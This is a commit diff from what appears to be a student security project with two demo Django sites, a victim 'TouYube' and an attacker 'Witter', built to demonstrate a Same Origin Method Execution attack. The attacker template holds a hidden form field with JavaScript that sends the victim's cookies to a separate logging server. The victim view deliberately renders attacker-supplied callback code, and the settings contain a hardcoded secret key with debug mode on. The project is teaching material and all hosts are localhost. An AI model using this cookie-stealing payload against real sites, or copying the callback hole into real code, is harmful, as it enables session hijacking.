study-faraphel/M1-SR-SOME
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity

fixed Witter icon

Browse source
This commit is contained in:
Faraphel 2024-05-15 11:13:58 +02:00
parent d614b8ea26
commit 0b961c7551
3 changed files with 10 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
TouYube/apps/TouYube/views.py
View file

@ -5,9 +5,9 @@ from django.contrib.auth.decorators import login_required
from django.core.handlers.wsgi import WSGIRequest from django.core.handlers.wsgi import WSGIRequest
from django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest from django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest
from django.shortcuts import render, redirect, get_object_or_404 from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.csrf import csrf_protect
from apps.TouYube import forms, models from apps.TouYube import forms, models
from configuration import settings
def view_homepage(request: WSGIRequest) -> HttpResponse: def view_homepage(request: WSGIRequest) -> HttpResponse:
@ -143,11 +143,11 @@ def view_attack_some(request: WSGIRequest) -> HttpResponse:
""" """
# check the method # check the method
if request.method != "GET": if request.method != "POST":
return HttpResponseBadRequest() return HttpResponseBadRequest()
# get the callback code # get the callback code
callback_js = request.GET["callback"] callback_js = request.POST["callback"]
return render( return render(
request, request,

2
TouYube/configuration/settings.py
View file

@ -24,7 +24,7 @@ SECRET_KEY = 'django-insecure-87uz=bnd&m+$(!qfzs3$bum)!e6pw$8gaw_^cehmuyuft5q4!#
# SECURITY WARNING: don't run with debug turned on in production! # SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True DEBUG = True
ENABLE_CROSS_ORIGIN_SECURITY = False ENABLE_CROSS_ORIGIN_SECURITY = True # Enable all the CORS, XFRAME, ... securities
ALLOWED_HOSTS = [] ALLOWED_HOSTS = []

5
Witter/apps/Witter/templates/Witter/some.html
View file

@ -4,7 +4,7 @@
{% block body %} {% block body %}
<h1>SOME</h1> <h1>SOME</h1>
<form id="attack-form" action="http://localhost:8080/callback/" method="GET"> <form id="attack-form" action="http://localhost:8080/callback/" method="POST">
<input type="hidden" name="callback" value=" <input type="hidden" name="callback" value="
{# once the victim is calling the callback, send his cookies to this URL #} {# once the victim is calling the callback, send his cookies to this URL #}
fetch('http://localhost:8081/logs/', { fetch('http://localhost:8081/logs/', {
@ -15,9 +15,10 @@
headers: { headers: {
'Content-type': 'application/json; charset=UTF-8' 'Content-type': 'application/json; charset=UTF-8'
} }
}); }).then(data => {
{# redirect the user to the homepage #} {# redirect the user to the homepage #}
document.location.href='http://localhost:8080/'; document.location.href='http://localhost:8080/';
});
"> ">
<input type="submit" value="See my TouYube account with no security flaw 😊"> <input type="submit" value="See my TouYube account with no security flaw 😊">